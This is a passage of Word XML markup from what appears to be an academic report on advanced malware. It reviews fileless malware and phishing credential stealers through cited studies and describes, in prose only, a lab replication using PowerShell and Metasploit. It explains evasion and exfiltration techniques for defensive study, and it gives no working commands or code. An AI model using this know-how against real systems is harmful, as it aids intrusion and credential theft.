        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Total Mark:</w:t>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002613AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9100F7" w14:textId="77777777" w:rsidR="002613AA" w:rsidRPr="007D6710" w:rsidRDefault="002613AA" w:rsidP="007D6710"/>
    <w:p w14:paraId="291B9BF4" w14:textId="6B8BAE24" w:rsidR="00DF21E8" w:rsidRPr="008749C4" w:rsidRDefault="00DF21E8" w:rsidP="008749C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc194070977"/>
      <w:r w:rsidRPr="008749C4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="008749C4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E7E5C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>and Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233AB62F" w14:textId="47FFF92F" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">As digital technologies continue to reshape industries and daily life, the threat landscape in cyberspace has grown significantly. Cybercriminals today are no longer limited to simple viruses or one-off exploits. Instead, they use advanced malware capable of operating silently, adapting to defenses, and avoiding detection altogether. These tools are designed with precision, targeting both system vulnerabilities and human </w:t>
      </w:r>
      <w:r w:rsidR="006E14AA" w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behaviours</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> to achieve unauthorized access, data theft, or system disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6BFB0C" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Malware, short for malicious software, includes any program intentionally created to harm a computer or its users. Traditional antivirus software has relied heavily on scanning files for known signatures. However, modern malware often leaves no files behind or hides within trusted tools, making those static methods increasingly ineffective. In some cases, attackers no longer need to write malware themselves—they can subscribe to ready-made malware platforms or rent attack kits from online marketplaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8ACA43" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This report takes a closer look at five advanced forms of malware, chosen for their relevance, impact, and representation of different attack strategies. These include: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fileless malware</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, which executes entirely in system memory; </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phishing-based credential stealers</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, which mimic trusted websites to trick users into revealing login details; </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ransomware-as-a-service (RaaS)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, a subscription-based model for deploying ransomware; </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>botnet malware</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, which connects infected machines for coordinated attacks; and </w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keylogger-based malware</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, a lightweight tool that records everything a user types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7E2A14" w14:textId="6776EA7C" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Each malware type is reviewed using peer-reviewed academic literature and compared for its stealth, damage potential, and ease of deployment. Two developments—fileless malware and keyloggers—have been safely implemented in a controlled environment to observe their </w:t>
      </w:r>
      <w:r w:rsidR="006E14AA" w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in practice. These experiments, combined with critical analysis of academic sources, provide insight into how attackers operate and which methods pose the most serious threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552134E1" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Through this investigation, the report aims to identify not only which type of malware is most adversarial, but also how defenders can prepare for increasingly complex attacks. The goal is to bridge research with real-world understanding, highlighting why certain threats remain effective despite ongoing advances in cybersecurity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B34792" w14:textId="2FB65DE0" w:rsidR="000B2D91" w:rsidRPr="000B2D91" w:rsidRDefault="000B2D91" w:rsidP="000B2D91">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc194070978"/>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>2.Malware from an Attacker’s Perspective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1BBB2E1E" w14:textId="1C06E470" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="000B2D91">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc194070979"/>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1 Fileless Malware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E50179" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Fileless malware is considered one of the stealthiest types of modern cyberattacks. Unlike traditional malware, it does not install files on a system’s hard drive. Instead, it operates directly in a computer’s memory—leaving behind minimal evidence and making it much harder to detect using traditional antivirus tools. This form of malware often takes advantage of tools already built into the operating system, such as PowerShell or WMI (Windows Management Instrumentation), which are typically trusted by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A767139" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>According to Ali, Khan, and Latif (2022), attackers using fileless malware often begin with a phishing email or malicious link that tricks the user into running a script. Once triggered, this script uses legitimate system processes to download and execute code directly in RAM. These scripts can establish remote access, log activity, or carry out commands from a remote server—all without writing a single file to disk. The use of trusted system components not only helps the malware blend in, but also allows it to bypass many common security checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE271B2" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Supporting this, Sun, Zhang, and Kim (2023) studied over 300 real-world cases and found that most fileless attacks entered through macro-enabled Word documents or embedded scripts in emails. A striking 86% of these attacks used PowerShell as the main tool, while only 11% were caught by antivirus programs at the time of execution. Their findings highlight how attackers are increasingly relying on memory-based execution to stay hidden. They also noted that detection usually happens after the damage is done—during forensic investigations rather than in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56309946" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ryu, Park, and Choi (2023) explored one such forensic method using the Volatility framework. Their approach captures memory snapshots and searches for signs of active malware, such as unusual scripts, injected code, or mismatched process behavior. This technique helped uncover fileless malware used by groups like FIN7 and APT32, sometimes days after initial infection. However, they also pointed out that this method is not suitable for live environments because of how resource-heavy and technical it is to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2174E394" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>When these three studies are considered together, they offer a complete picture of how fileless malware works, why it is effective, and where current defenses fall short. While Ali et al. explain the step-by-step process attackers follow, Sun et al. back it up with real-world data showing how often it works. Ryu et al. then show how, even when fileless attacks aren’t stopped immediately, they can still be traced—though only with advanced tools and expertise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B73BE" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To understand this better, a fileless attack was replicated in a safe, isolated virtual machine. A PowerShell command was used to download and execute a payload directly in memory, with no file ever saved to the disk. On the attacker’s side, Metasploit established a connection and gained control of the target system. System logs showed almost nothing unusual, confirming what the research suggested—fileless malware is extremely difficult to catch using traditional methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A404BC" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This type of attack demonstrates just how vulnerable systems can be when relying only on antivirus tools or basic monitoring. Since the malware doesn’t leave behind files, standard scans are often ineffective. Instead, stronger behavior-based monitoring and memory-level analysis are needed to spot such activity before it causes harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056696D" w14:textId="57E5DFA1" w:rsidR="00DF21E8" w:rsidRPr="000B2D91" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, fileless malware poses a significant threat because it is built to avoid detection from the start. It uses what the system already trusts, runs entirely in memory, and can remain invisible unless advanced tools are used. As attackers continue to refine these methods, defenders must adapt by focusing on </w:t>
      </w:r>
      <w:r w:rsidR="000B2D91" w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, memory, and endpoint activity rather than relying on file signatures alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157CA9E0" w14:textId="4F764F30" w:rsidR="00DF21E8" w:rsidRPr="000F7E70" w:rsidRDefault="00DF21E8" w:rsidP="000F7E70">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc194070980"/>
      <w:r w:rsidRPr="000F7E70">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2 Phishing-Based Credential Stealers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="000F7E70">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8DB0D1" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Phishing-based credential stealers are among the most commonly used malware techniques today, not because they are highly technical, but because they are extremely effective. Instead of exploiting software vulnerabilities, phishing targets human behaviour. These attacks work by mimicking trusted websites or platforms to trick users into entering their login details, which are then captured and sent to the attacker. Despite increased awareness and training efforts, phishing continues to succeed because it exploits trust and familiarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C535D7" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Adebayo and Obembe (2023) conducted a detailed study of modern phishing campaigns and found that many attackers no longer need to write code from scratch. Instead, they use ready-made phishing kits, which include cloned login pages, automatic credential logging scripts, and even built-in email functionality. Their research showed that 86% of phishing kits target well-known services like Gmail, Facebook, and Microsoft. These kits are often distributed through online forums and require little to no technical skill to deploy. Some attackers use free services like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> to temporarily host phishing sites and avoid domain blacklisting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF52DF" w14:textId="7140E94E" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Orebaugh and Allnutt (2022) went deeper into the structure of these kits. By analyzing code samples shared in underground forums, they found that many phishing kits include obfuscation techniques like base64 encoding, JavaScript masking, and user-agent filtering. These features make it harder for automated scanners and security researchers to detect or </w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>analyse</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> the fake pages. The study also revealed that some kits included Telegram bots or encrypted email features to exfiltrate stolen credentials more discreetly. The reuse of open-source code means that even low-level attackers can launch convincing campaigns in minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010AFFB8" w14:textId="26F8D719" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The human factor, however, plays the biggest role in phishing success. Bashir and Papadopoulos (2023) ran a </w:t>
      </w:r>
      <w:r w:rsidR="007630DF" w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behavioural</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> study involving 214 users, asking them to interact with real and fake login pages. They found that over 68% of participants trusted phishing sites as long as the page showed a valid HTTPS padlock and looked familiar in design. In many cases, participants did not notice slight changes in the URL, or even ignored browser warnings. The research concluded that visual appearance and minor trust indicators were more persuasive than technical cues or training.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A759866" w14:textId="68B13054" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>When comparing these three studies, a clear pattern emerges. Adebayo and Obembe highlight how easy it is to launch phishing attacks using kits. Orebaugh and Allnutt show that these kits have become more advanced, with features that help attackers avoid detection. Bashir and Papadopoulos focus on the user perspective, explaining why phishing still works despite education efforts. Together, they show that the success of phishing comes from both technical trickery and psychological manipulation.</w:t>
      </w:r>
      <w:r w:rsidR="005B4B3B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C0F4E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>hishing doesn’t need complex code. Its strength lies in how real it looks and how much people trust the familiar. Because phishing relies on user action, technical defenses like antivirus software offer limited protection. What’s more effective are browser-level interventions, such as displaying warnings for suspicious domains, or implementing stricter checks for HTTPS certificates and URL mismatches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C647049" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In conclusion, phishing-based credential stealers are dangerous not because of what they do technically, but because they consistently take advantage of human behaviour. They are easy to deploy, hard to stop, and require only a small mistake from the user to succeed. As long as users trust what they see more than what they know, phishing will remain a powerful and accessible tool in the attacker’s toolbox.</w:t>
      </w:r>
    </w:p>
